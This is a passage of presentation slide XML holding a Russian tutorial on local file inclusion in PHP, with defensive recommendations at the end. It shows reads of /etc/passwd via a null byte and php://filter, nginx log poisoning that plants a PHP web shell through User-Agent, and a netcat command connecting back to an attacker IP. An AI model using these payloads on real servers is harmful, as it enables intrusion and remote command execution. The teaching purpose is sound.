              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, позволяющие включать контент на страницу из локального файла. В нашем случае это выглядит следующим образом:</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Благодаря строчке </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>include</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file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>”)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> в содержимое страницы будет включаться значение GET-параметра </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>. Теперь, используя эту уязвимость, нам будут возвращаться локальные файлы, которые мы укажем в параметре.</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Статья носит информационный характер. Не нарушайте законодательство.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Обнаружение уязвимости</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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Как обнаружить уязвимость? Если указать в потенциально уязвимом параметре включение какого-то локального файла, например, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> с любым расширением, и этот файл откроется, то однозначно можно утверждать, что параметр отвечает за подкачку файла. Сделать это можно как вручную, так и с помощью различных автоматизированных инструментов, например, сканером уязвимостей </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Wapiti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, о котором говорилось в одной из наших </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0097E6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>статей</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, или специализированным инструментом </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0097E6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>LFISuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, который разработан именно под поиск и эксплуатацию LFI-уязвимостей.</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Какие здесь могут быть подводные камни? Например, наличие фильтрации, которая будет подставлять в окончание строки расширение файла, например,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php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>. Таким образом, при попытке включения в страницу файла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etc</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passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> мы получим в адресной строке </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>file</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etc</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passwd.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, а содержимое этого файла не будет отображаться на странице, так как файла не существует. Но такой фильтр можно обойти с помощью так называемого нулевого байта, который будет «отсекать» все, что будет идти после него. Дело в том, что вся адресная строка при передаче HTTP-запроса кодируется в URL-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, и в этой кодировке нулевой байт выглядит как </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>%00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>. Таким образом, строчка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etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>/passwd%00.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> будет преобразована в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etc</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passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>. Однако стоит отметить, что данная проблема является довольно известной и исправлена в версии </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>PHP 5.3+</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Другой вариант обхода фильтрации — использование </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>. В параметре, отвечающем за включение файлов, пишем не просто путь до файла, который мы хотим включить, а путь до файла с использованием этой функции. Теперь запрос, который мы будем отправлять, имеет вид:</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http://site.test.lan/index2.php?file=php://filter/convert.base64-encode/resource=/etc/passwd</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И теперь на странице браузера мы увидим не содержимое файла, а его исходник в кодировке </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, который можно декодировать:</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С основными моментами уязвимости LFI разобрались, и теперь понимаем, что при ее эксплуатации можно прочитать локальный файл на удаленном сервере. Но у LFI есть интересная особенность, позволяющая не просто прочитать локальные файлы, а скомпрометировать сервер.</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1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Отравление журнала веб-сервера</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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Думаю, стоит сразу оговориться, что уязвимость не новая, но тем не менее она до сих встречается и может представлять серьезную угрозу для безопасности веб-сервера. При взаимодействии с веб-приложением любой наш запрос записывается в журналы веб-сервера, как правило, это файлы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var</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log</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nginx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>/access.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> или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var</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log</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nginx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>/error.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> если, например, используется веб-сервер </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Nginx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, но названия конечных файлов, разумеется, могут отличаться.</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Теперь, составив специальный запрос, мы создадим веб-шелл на сервере, записав его в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>access.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>. Для отправки запроса будем использовать инструмент </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0097E6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0097E6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t> Suite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, позволяющий в режиме реального времени перехватывать и редактировать запросы.</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Наш веб-шелл </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>($_GET[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>]); ?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> записан в журнале веб-сервера и готов к использованию.</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Почему использовался именно параметр </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>User-Agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>? Как уже говорилось ранее, адресная строка кодирует информацию с помощью URL-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, поэтому для передачи </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>-кода нужно использовать заголовки, а так как в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>access.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> точно пишется User-Agent, то и используем его. Обратившись к нашему веб-шеллу, получаем возможность выполнять различные команды через параметр </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>:</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http://site.test.lan/index2.php?file=/var/log/nginx/access.log&amp;cmd=ls /</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В чем отличие? LFI позволяет включать файл на сервере, но необходимо указать полный путь до этого файла, то есть знать, где этот файл находится. Во втором случае выполняется команда на самом сервере, а результат отображается в веб-приложении.</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Убедившись, что мы можем выполнять различные команды на сервере, переходим к получению доступа на него. Для этого указываем в параметре </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> команду запуска </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> для связи с сервером атакующего, то есть с нами:</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http://site.test.lan/index2.php?file=/var/log/nginx/access.log&amp;cmd=nc 192.168.0.135 4455</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r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Рекомендации</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:br>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>регулярно проверять безопасность веб-приложения с целью предотвращения возникновения уязвимостей;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>добавить в журнал веб-сервера строчку </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(1); ?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>. Данный скрипт будет предотвращать любые попытки выполнения </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>-кода в этом файле;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
